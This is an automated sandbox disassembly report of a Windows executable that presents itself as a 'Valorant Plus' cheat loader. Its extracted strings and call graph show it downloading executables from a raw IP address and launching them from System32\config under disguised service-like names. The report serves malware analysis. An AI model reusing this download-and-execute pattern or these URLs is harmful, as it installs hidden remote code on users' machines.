7ff6029dc850 realloc GetEnvironmentVariableA realloc free 50220->50383 50221->50193 50222 7ff6029c3fe0 50222->50212 50381 7ff6029dc850 realloc GetEnvironmentVariableA realloc free 50222->50381 50223 7ff6029c3ec0 strchr 50223->50229 50226 7ff6029c3ef0 strchr 50226->50229 50227->50216 50228 7ff6029c4207 free 50227->50228 50228->50216 50229->50203 50229->50204 50229->50223 50229->50226 50231 7ff6029c44c1 50230->50231 50232 7ff6029c44f4 50230->50232 50231->50232 50235 7ff6029c44e0 50231->50235 50236 7ff6029c44d4 free 50231->50236 50233 7ff6029c452b 50232->50233 50234 7ff6029c4509 free _strdup 50232->50234 50237 7ff6029c453f free _strdup 50233->50237 50238 7ff6029c4561 50233->50238 50234->50233 50245 7ff6029c4628 50234->50245 50235->50232 50240 7ff6029c44e8 free 50235->50240 50236->50235 50237->50238 50237->50245 50239 7ff6029c4575 free _strdup 50238->50239 50241 7ff6029c459f 50238->50241 50239->50241 50239->50245 50240->50232 50241->50245 50386 7ff6029f0d40 36 API calls 50241->50386 50243 7ff6029c460e 50244 7ff6029c6400 15 API calls 50243->50244 50243->50245 50244->50245 50245->50032 50252 7ff6029c4930 50246->50252 50247 7ff6029c3467 50247->50104 50256 7ff6029c1fd0 50247->50256 50249 7ff6029c4a08 strchr 50250 7ff6029c4a1d strtol 50249->50250 50249->50252 50250->50252 50252->50247 50252->50249 50253 7ff6029c4aaa free 50252->50253 50254 7ff6029c49d7 free 50252->50254 50255 7ff6029c6400 15 API calls 50252->50255 50387 7ff6029c96c0 15 API calls 50252->50387 50388 7ff6029c4700 22 API calls 50252->50388 50253->50252 50254->50252 50254->50253 50255->50252 50257 7ff6029c201f 50256->50257 50260 7ff6029c2005 50256->50260 50258 7ff6029fff10 8 API calls 50257->50258 50259 7ff6029c2031 50258->50259 50259->50041 50259->50042 50259->50104 50260->50257 50389 7ff6029f0c90 18 API calls 50260->50389 50262 7ff6029c2058 50262->50257 50263 7ff6029c206b GetLastError 50262->50263 50390 7ff6029b2f50 21 API calls 50263->50390 50265 7ff6029c2083 50391 7ff6029c6280 19 API calls 50265->50391 50267 7ff6029c2099 50267->50257 50269 7ff6029bf815 50268->50269 50270 7ff6029bf7f6 _strdup 50268->50270 50272 7ff6029bf841 50269->50272 50273 7ff6029bf822 _strdup 50269->50273 50270->50269 50271 7ff6029bf805 50270->50271 50271->50049 50275 7ff6029bf84e _strdup 50272->50275 50276 7ff6029bf86d 50272->50276 50273->50272 50274 7ff6029bf831 50273->50274 50274->50049 50275->50276 50277 7ff6029bf85d 50275->50277 50278 7ff6029bf899 50276->50278 50279 7ff6029bf87a _strdup 50276->50279 50277->50049 50281 7ff6029bf8c5 50278->50281 50282 7ff6029bf8a6 _strdup 50278->50282 50279->50278 50280 7ff6029bf889 50279->50280 50280->50049 50284 7ff6029bf8d2 _strdup 50281->50284 50286 7ff6029bf8f1 50281->50286 50282->50281 50283 7ff6029bf8b5 50282->50283 50283->50049 50285 7ff6029bf8e1 50284->50285 50284->50286 50285->50049 50287 7ff6029bf8fe _strdup 50286->50287 50288 7ff6029bf91d 50286->50288 50287->50288 50289 7ff6029bf90d 50287->50289 50290 7ff6029bf92a _strdup 50288->50290 50291 7ff6029bf939 50288->50291 50289->50049 50290->50291 50291->50049 50293 7ff6029ce0c0 2 API calls 50292->50293 50294 7ff6029c5373 50293->50294 50296 7ff6029cee30 9 API calls 50294->50296 50297 7ff6029c3847 50294->50297 50298 7ff6029f1620 8 API calls 50294->50298 50300 7ff6029c6400 15 API calls 50294->50300 50302 7ff6029c6ee0 closesocket free 50294->50302 50303 7ff6029c54e6 30 API calls 50294->50303 50392 7ff6029cf7f0 free free free free 50294->50392 50393 7ff6029f1230 50294->50393 50396 7ff6029bb510 50294->50396 50296->50294 50297->50061 50350 7ff6029c0f10 15 API calls 50297->50350 50298->50294 50300->50294 50302->50294 50410 7ff6029c31b0 free free 50303->50410 50305 7ff6029c5746 50348->50058 50349->50053 50350->50064 50358 7ff6029eee20 13 API calls 50357->50358 50359 7ff6029c4eb4 50358->50359 50359->50124 50359->50125 50360->50129 50362->50133 50363->50134 50364->50141 50365->50144 50366->50142 50367->50147 50368->50151 50369->50155 50370->50160 50371->50161 50372->50163 50373->50169 50374->50168 50375->50185 50376->50189 50377->50186 50378->50188 50379->50191 50380->50222 50381->50212 50382->50220 50383->50217 50384->50213 50385->50215 50386->50243 50387->50252 50388->50252 50389->50262 50390->50265 50391->50267 50392->50294 50413 7ff6029f5150 7 API calls 50393->50413 50395 7ff6029f124e 50397 7ff6029bb980 50396->50397 50398 7ff6029bba24 free 50397->50398 50399 7ff6029bb998 EnterCriticalSection LeaveCriticalSection 50397->50399 50398->50294 50410->50305 50413->50395 50422 7ff6029b808b 50423 7ff6029b809e 50422->50423 50424 7ff6029cbfe0 407 API calls 50423->50424 50427 7ff6029b80a6 50423->50427 50434 7ff6029b8157 50423->50434 50426 7ff6029b80dd 50424->50426 50425 7ff6029b80e3 50429 7ff6029b7610 292 API calls 50425->50429 50426->50425 50426->50427 50426->50434 50445 7ff6029d1be0 50426->50445 50441 7ff6029b7b8b 50427->50441 50464 7ff6029cbe90 free 50427->50464 50429->50441 50430 7ff6029b8db0 17 API calls 50430->50441 50432 7ff6029b8c32 50433 7ff6029b8c23 50467 7ff6029c6280 19 API calls 50433->50467 50434->50425 50434->50427 50436 7ff6029c1d40 90 API calls 50436->50441 50438 7ff6029c7b00 10 API calls 50438->50441 50439 7ff6029c6280 19 API calls 50440 7ff6029b7c2e 50439->50440 50440->50439 50440->50441 50441->50430 50441->50432 50441->50433 50441->50436 50441->50438 50441->50440 50443 7ff6029b7610 292 API calls 50441->50443 50463 7ff6029c6280 19 API calls 50441->50463 50465 7ff6029b6330 15 API calls 50441->50465 50466 7ff6029d5af0 22 API calls 50441->50466 50443->50441 50446 7ff6029d1c0c 50445->50446 50447 7ff6029cbfe0 407 API calls 50446->50447 50450 7ff6029d1c16 50447->50450 50448 7ff6029fff10 8 API calls 50449 7ff6029d1d72 50448->50449 50449->50434 50451 7ff6029d1d2c 50450->50451 50452 7ff6029d1c67 50450->50452 50456 7ff6029d1d46 50450->50456 50453 7ff6029c0480 255 API calls 50451->50453 50451->50456 50454 7ff6029c9790 13 API calls 50452->50454 50453->50456 50455 7ff6029d1cd8 calloc 50454->50455 50457 7ff6029d1cf0 50455->50457 50458 7ff6029d1cf7 50455->50458 50456->50448 50457->50456 50459 7ff6029d2270 25 API calls 50458->50459 50460 7ff6029d1d06 50459->50460 50460->50456 50461 7ff6029d2020 62 API calls 50460->50461 50462 7ff6029d1d28 50461->50462 50462->50451 50462->50456 50463->50441 50464->50441 50465->50441 50466->50441 50467->50432
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$strchr$_strdup$callocmemcpystrstr
                                        • String ID: %s$%s $%s HTTP/%s%s%s%s%s%s%s%s%s%s%s%s%s$%s%s$%s%s=%s$%s: %s, %02d %s %4d %02d:%02d:%02d GMT$%s?%s$%x$0$1.0$1.1$100-continue$;type=$;type=%c$?%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: */*$Chunky upload is not supported by HTTP 1.0$Content-Length$Content-Length: %I64d$Content-Length: 0$Content-Range$Content-Range: bytes %s%I64d/%I64d$Content-Range: bytes %s/%I64d$Content-Range: bytes 0-%I64d/%I64d$Content-Type$Content-Type: application/x-www-form-urlencoded$Cookie$Cookie: $Could not seek stream$Could only read %I64d bytes from the input$Expect$Expect:$Failed sending HTTP POST request$Failed sending HTTP request$Failed sending POST request$Failed sending PUT request$File already completely uploaded$GET$HEAD$Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s$If-Modified-Since$If-Unmodified-Since$Invalid TIMEVALUE$Last-Modified$OPTIONS$POST$PUT$Proxy-Connection$Proxy-Connection: Keep-Alive$Range$Range: bytes=%s$Referer$Referer: %s$Transfer-Encoding$Transfer-Encoding:$Transfer-Encoding: chunked$User-Agent$chunked$ftp$ftp://%s:%s@%s$http$multipart/form-data$upload completely sent off: %I64d out of %I64d bytes
                                        • API String ID: 2045874074-4264080130
                                        • Opcode ID: 4168fa95d65f54a1e0795bddf3cd2d3dada032a491ce2ca990e0fbb27d0a3f89
                                        • Instruction ID: 13244301a96676a06906eaff01dceb14ea6cb696a4a16db735a3a47ad8809c43
                                        • Opcode Fuzzy Hash: 4168fa95d65f54a1e0795bddf3cd2d3dada032a491ce2ca990e0fbb27d0a3f89
                                        • Instruction Fuzzy Hash: B503AD22E09A8285FB658B66D8403B92FA1BF45B8CF644036CE4D97697EFBCF455D300

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 689 7ff6029b1e40-7ff6029b1e72 call 7ff6029ffb18 692 7ff6029b1e80 689->692 693 7ff6029b1e74-7ff6029b1e7e 689->693 694 7ff6029b1e83-7ff6029b1eb2 _beginthreadex 692->694 693->694 695 7ff6029b1eb8-7ff6029b1ebd 694->695 696 7ff6029b2369-7ff6029b2377 ?_Throw_Cpp_error@std@@YAXH@Z 694->696 697 7ff6029b235e-7ff6029b2368 ?_Throw_Cpp_error@std@@YAXH@Z 695->697 698 7ff6029b1ec3-7ff6029b1eda _Thrd_detach 695->698 697->696 698->697 699 7ff6029b1ee0-7ff6029b2230 GetStdHandle GetConsoleMode SetConsoleMode GetStdHandle GetConsoleScreenBufferInfoEx SetConsoleScreenBufferInfoEx GetConsoleMode SetConsoleMode GetConsoleWindow GetWindowLongA SetWindowLongA GetConsoleWindow GetWindowRect MoveWindow GetStdHandle SetConsoleTextAttribute call 7ff6029a2ab0 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 * 2 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 * 2 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 * 2 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 GetStdHandle SetConsoleTextAttribute call 7ff6029b2380 ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z 698->699 734 7ff6029b2232-7ff6029b22ac call 7ff6029a3d40 * 2 call 7ff6029a3b20 * 2 URLDownloadToFileA system * 2 Sleep exit 699->734 735 7ff6029b22ad-7ff6029b22b0 699->735 734->735 737 7ff6029b22b2-7ff6029b232c call 7ff6029a3d40 * 2 call 7ff6029a3b20 * 2 URLDownloadToFileA system * 2 Sleep exit 735->737 738 7ff6029b232d-7ff6029b2332 735->738 737->738 740 7ff6029b2334-7ff6029b233a terminate 738->740 741 7ff6029b233b-7ff6029b235d call 7ff6029fff10 738->741 740->741
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: Console$Handle$AttributeText$Window$Modesystem$BufferCpp_error@std@@DownloadFileInfoLongScreenSleepThrow_exit$??5?$basic_istream@D@std@@@std@@MoveRectThrd_detachU?$char_traits@V01@__acrt_iob_func__stdio_common_vfprintf_beginthreadexmallocterminate
                                        • String ID: Iniciar Valorant Plus (HVCI DESLIGADO): $ Iniciar Valorant Plus (HVCI HABILITADO): $ Selecione a opcao: $##########################################################$##########################################################$C:\Windows\System32\config\SerHuStinsHostDialog.exe$C:\Windows\System32\config\ServceHubeinssDialog.exe$[ Selecione uma opcao: ]$cd C:\$http://167.114.85.75/plusattnewhvcionprivate.exe$http://167.114.85.75/plushvcioffbronkzatualizadoh79.exe$start C:\Windows\System32\config\SerHuStinsHostDialog.exe$start C:\Windows\System32\config\ServceHubeinssDialog.exe
                                        • API String ID: 3379756739-3894013811
                                        • Opcode ID: 4519ff242e0ccbef95bfe72667addcaf5c00a9630420e14a4216ffcff7c97b11
                                        • Instruction ID: 63956706815ff8548e1c08fc68d578bbcb92d64320e3d2d1e15600d4f9f93814
                                        • Opcode Fuzzy Hash: 4519ff242e0ccbef95bfe72667addcaf5c00a9630420e14a4216ffcff7c97b11
                                        • Instruction Fuzzy Hash: 83D12521E09B4382EB049B71E8982797B61FF89B59F600235DE1E876E5DFBCE545C340
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: strchr$_strdupstrncmpstrtol
                                        • String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$Services$Unable to set ciphers to passed via SSL_CONN_CONFIG$Users$http/1.1$http/1.1$schannel: ALPN, offering %s$schannel: AcquireCredentialsHandle failed: %s$schannel: Failed to get certificate from file %s, last error is 0x%x$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%x$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %x %s, last error is 0x%x$schannel: Failed to read cert file %s$schannel: TLS 1.3 is not yet supported$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.
                                        • API String ID: 707411602-3372543188
                                        • Opcode ID: 05868821c97f94baf6164b8d17389528a2746141e5772ed87361180ad4809c89
                                        • Instruction ID: cc7a5e06167e5f67f8b931ef78bdf9f77eeca24d1438cdd16720e785c6e63f20
                                        • Opcode Fuzzy Hash: 05868821c97f94baf6164b8d17389528a2746141e5772ed87361180ad4809c89
                                        • Instruction Fuzzy Hash: AE42A131A08B4286EB648F26E8947B92BA4FF44B9CF604135CE5E87796DFBCE544D700

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1172 7ff6029c9290-7ff6029c92ac 1173 7ff6029c92ae-7ff6029c92c0 WSAStartup 1172->1173 1174 7ff6029c92f6-7ff6029c92fd call 7ff6029f2d90 1172->1174 1175 7ff6029c92c2-7ff6029c92c9 1173->1175 1176 7ff6029c92d9-7ff6029c92f5 call 7ff6029fff10 1173->1176 1183 7ff6029c9303-7ff6029c9330 GetModuleHandleA 1174->1183 1184 7ff6029c95bf-7ff6029c95d6 call 7ff6029fff10 1174->1184 1178 7ff6029c92d3 WSACleanup 1175->1178 1179 7ff6029c92cb-7ff6029c92d1 1175->1179 1178->1176 1179->1174 1179->1178 1186 7ff6029c9332-7ff6029c9339 1183->1186 1187 7ff6029c933e-7ff6029c9373 GetProcAddress strpbrk 1183->1187 1188 7ff6029c94c3-7ff6029c95b7 VerSetConditionMask * 5 VerifyVersionInfoA QueryPerformanceFrequency 1186->1188 1189 7ff6029c9375-7ff6029c937b 1187->1189 1190 7ff6029c939b-7ff6029c939e 1187->1190 1188->1184 1192 7ff6029c938d-7ff6029c9396 LoadLibraryA 1189->1192 1193 7ff6029c937d-7ff6029c9388 1189->1193 1194 7ff6029c93a0-7ff6029c93b3 GetProcAddress 1190->1194 1195 7ff6029c93ca-7ff6029c93e1 GetSystemDirectoryA 1190->1195 1196 7ff6029c948a-7ff6029c949c 1192->1196 1193->1196 1194->1195 1197 7ff6029c93b5-7ff6029c93c5 LoadLibraryExA 1194->1197 1198 7ff6029c9482 1195->1198 1199 7ff6029c93e7-7ff6029c93fa malloc 1195->1199 1196->1188 1201 7ff6029c949e-7ff6029c94bc GetProcAddress 1196->1201 1197->1196 1198->1196 1202 7ff6029c93fc-7ff6029c940a GetSystemDirectoryA 1199->1202 1203 7ff6029c9479-7ff6029c947c free 1199->1203 1201->1188 1202->1203 1204 7ff6029c940c-7ff6029c9416 1202->1204 1203->1198 1205 7ff6029c9420-7ff6029c9429 1204->1205 1205->1205 1206 7ff6029c942b-7ff6029c9430 1205->1206 1207 7ff6029c9434-7ff6029c943b 1206->1207 1207->1207 1208 7ff6029c943d-7ff6029c9446 1207->1208 1209 7ff6029c9450-7ff6029c945c 1208->1209 1209->1209 1210 7ff6029c945e-7ff6029c9464 1209->1210 1211 7ff6029c9470 LoadLibraryA 1210->1211 1212 7ff6029c9466-7ff6029c946e 1210->1212 1213 7ff6029c9476 1211->1213 1212->1213 1213->1203
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ConditionMask$AddressLibraryLoadProc$DirectorySystem$CleanupFrequencyHandleInfoModulePerformanceQueryStartupVerifyVersionfreemallocstrpbrk
                                        • String ID: AddDllDirectory$LoadLibraryExA$if_nametoindex$iphlpapi.dll$kernel32
                                        • API String ID: 2612373469-2794540096
                                        • Opcode ID: de4467785da5013e920e77c5cee71bf5eccab42b814541a419c8975c411fe98b
                                        • Instruction ID: a13a23380f456d31d984720b263f5aae8970741414a2e26b97aea72d2fa56ea3
                                        • Opcode Fuzzy Hash: de4467785da5013e920e77c5cee71bf5eccab42b814541a419c8975c411fe98b
                                        • Instruction Fuzzy Hash: 77917021E0878282FB648B22A4543BA7BA1FF89B88F644535DD8E87755EFBCE445C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1469 7ff6029c85d0-7ff6029c863d 1470 7ff6029c8642-7ff6029c8652 1469->1470 1471 7ff6029c863f 1469->1471 1472 7ff6029c8654-7ff6029c865c 1470->1472 1473 7ff6029c8661-7ff6029c8679 memcpy 1470->1473 1471->1470 1472->1473 1474 7ff6029c867b-7ff6029c86a6 call 7ff6029b6ba0 * 2 1473->1474 1475 7ff6029c86a8-7ff6029c86bb socket 1473->1475 1476 7ff6029c86be-7ff6029c86ca 1474->1476 1475->1476 1478 7ff6029c8b5f 1476->1478 1479 7ff6029c86d0-7ff6029c86d8 1476->1479 1483 7ff6029c8b64-7ff6029c8b8d call 7ff6029fff10 1478->1483 1481 7ff6029c86da-7ff6029c86e2 call 7ff6029d55a0 1479->1481 1482 7ff6029c86e7-7ff6029c86f0 1479->1482 1481->1482 1485 7ff6029c86f2-7ff6029c86fd 1482->1485 1486 7ff6029c8700-7ff6029c8709 1482->1486 1485->1486 1490 7ff6029c870b-7ff6029c870e 1486->1490 1491 7ff6029c871c-7ff6029c8720 1486->1491 1494 7ff6029c8714-7ff6029c871a 1490->1494 1495 7ff6029c8b0a-7ff6029c8b5d _errno * 3 call 7ff6029b2e10 call 7ff6029c6280 call 7ff6029c6ee0 1490->1495 1496 7ff6029c8725-7ff6029c8737 call 7ff6029f1ad0 1491->1496 1494->1496 1495->1483 1496->1495 1501 7ff6029c873d-7ff6029c8765 htons call 7ff6029c6400 1496->1501 1507 7ff6029c876c-7ff6029c8771 1501->1507 1508 7ff6029c8767-7ff6029c876a 1501->1508 1510 7ff6029c87de 1507->1510 1511 7ff6029c8773-7ff6029c877d 1507->1511 1508->1507 1508->1510 1513 7ff6029c87e1-7ff6029c87fd 1510->1513 1512 7ff6029c877f-7ff6029c87ab setsockopt 1511->1512 1511->1513 1514 7ff6029c87ad-7ff6029c87d4 WSAGetLastError call 7ff6029b2e10 call 7ff6029c6400 1512->1514 1515 7ff6029c87d9-7ff6029c87dc 1512->1515 1516 7ff6029c87ff-7ff6029c8813 call 7ff6029c9110 1513->1516 1517 7ff6029c882d-7ff6029c8830 1513->1517 1514->1515 1515->1513 1528 7ff6029c8815-7ff6029c881f 1516->1528 1529 7ff6029c8821-7ff6029c882b 1516->1529 1518 7ff6029c8832-7ff6029c8857 getsockopt 1517->1518 1519 7ff6029c8884-7ff6029c8887 1517->1519 1523 7ff6029c8863-7ff6029c887e setsockopt 1518->1523 1524 7ff6029c8859-7ff6029c8861 1518->1524 1525 7ff6029c896f-7ff6029c8976 1519->1525 1526 7ff6029c888d-7ff6029c8894 1519->1526 1523->1519 1524->1519 1524->1523 1530 7ff6029c89aa-7ff6029c89b1 1525->1530 1531 7ff6029c8978-7ff6029c89a5 call 7ff6029b6ba0 * 2 1525->1531 1526->1525 1532 7ff6029c889a-7ff6029c88c5 setsockopt 1526->1532 1528->1519 1529->1518 1537 7ff6029c89b3-7ff6029c89b6 1530->1537 1538 7ff6029c89b8-7ff6029c89d8 call 7ff6029f1a40 call 7ff6029c7f40 1530->1538 1564 7ff6029c89f5-7ff6029c89f7 1531->1564 1565 7ff6029c89a7 1531->1565 1535 7ff6029c88de-7ff6029c8952 call 7ff6029c8c80 * 2 WSAIoctl 1532->1535 1536 7ff6029c88c7-7ff6029c88d9 call 7ff6029c6400 1532->1536 1535->1525 1557 7ff6029c8954-7ff6029c896a WSAGetLastError call 7ff6029c6400 1535->1557 1536->1525 1537->1538 1543 7ff6029c8a0e-7ff6029c8a38 call 7ff6029d55a0 call 7ff6029ce0c0 1537->1543 1538->1543 1558 7ff6029c89da-7ff6029c89e8 call 7ff6029c6ee0 1538->1558 1560 7ff6029c8a4f-7ff6029c8a52 1543->1560 1561 7ff6029c8a3a-7ff6029c8a4a call 7ff6029b6100 1543->1561 1557->1525 1558->1478 1572 7ff6029c89ee-7ff6029c89f0 1558->1572 1567 7ff6029c8aff-7ff6029c8b08 1560->1567 1568 7ff6029c8a58-7ff6029c8a60 1560->1568 1561->1560 1564->1530 1570 7ff6029c89f9-7ff6029c8a09 call 7ff6029c6ee0 1564->1570 1565->1530 1567->1483 1568->1567 1571 7ff6029c8a66-7ff6029c8a6d 1568->1571 1570->1483 1574 7ff6029c8a6f-7ff6029c8a84 connect 1571->1574 1575 7ff6029c8a98-7ff6029c8aa3 WSAGetLastError 1571->1575 1572->1483 1574->1575 1577 7ff6029c8a86-7ff6029c8a88 1574->1577 1578 7ff6029c8af2-7ff6029c8af4 1575->1578 1579 7ff6029c8aa5-7ff6029c8aae 1575->1579 1580 7ff6029c8afb-7ff6029c8afd 1577->1580 1581 7ff6029c8a8a-7ff6029c8a93 1577->1581 1578->1580 1579->1578 1582 7ff6029c8ab0-7ff6029c8af0 call 7ff6029b2e10 call 7ff6029c6400 call 7ff6029c6ee0 1579->1582 1580->1483 1581->1483 1582->1483
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLast$setsockopt$fwrite$CounterIoctlPerformanceQuery_errnoclosesocketconnectgetsockopthtonsioctlsocketmemcpysocket
                                        • String ID: Trying %s:%ld...$ @$Could not set TCP_NODELAY: %s$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$sa_addr inet_ntop() failed with errno %d: %s
                                        • API String ID: 3453287622-3868455274
                                        • Opcode ID: 7bf2d13336c310cc79c34e1abbc244edac4caa989a10c104aeb3ac690cade68f
                                        • Instruction ID: e06345bff957e63edb346f5706f2715f1243afb31376e263ac9d5b671cfe552c
                                        • Opcode Fuzzy Hash: 7bf2d13336c310cc79c34e1abbc244edac4caa989a10c104aeb3ac690cade68f
                                        • Instruction Fuzzy Hash: 8CF1D071A0828286EB55DB26D4542BE6BA0FF84B8CF704835DA4DC7B96DFBCE545CB00

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2126 7ff6029d5370-7ff6029d53be socket 2127 7ff6029d53c5-7ff6029d541e htonl setsockopt 2126->2127 2128 7ff6029d53c0 2126->2128 2130 7ff6029d5424-7ff6029d5439 bind 2127->2130 2131 7ff6029d554b-7ff6029d5567 closesocket * 3 2127->2131 2129 7ff6029d5574-7ff6029d5592 call 7ff6029fff10 2128->2129 2130->2131 2134 7ff6029d543f-7ff6029d5455 getsockname 2130->2134 2132 7ff6029d556c 2131->2132 2132->2129 2134->2131 2136 7ff6029d545b-7ff6029d546a listen 2134->2136 2136->2131 2137 7ff6029d5470-7ff6029d5485 socket 2136->2137 2137->2131 2138 7ff6029d548b-7ff6029d54a0 connect 2137->2138 2138->2131 2139 7ff6029d54a6-7ff6029d54bc accept 2138->2139 2139->2131 2140 7ff6029d54c2-7ff6029d54de call 7ff6029c9790 2139->2140 2143 7ff6029d54e5-7ff6029d54ec 2140->2143 2143->2143 2144 7ff6029d54ee-7ff6029d5508 send 2143->2144 2144->2131 2145 7ff6029d550a-7ff6029d5526 recv 2144->2145 2145->2131 2146 7ff6029d5528-7ff6029d553c memcmp 2145->2146 2146->2131 2147 7ff6029d553e-7ff6029d5549 closesocket 2146->2147 2147->2132
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: socket$acceptbindclosesocketconnectgetsocknamehtonllistenmemcmprecvsendsetsockopt
                                        • String ID:
                                        • API String ID: 3699910901-0
                                        • Opcode ID: 41927ea1387b75350c3ebf46daa169a36e0fbdbc2e22d370c80ef841000f6fad
                                        • Instruction ID: d9ec25c24898f24fb0c5deaa50f44e2232b128175d0126c2b1095ad97e92b021
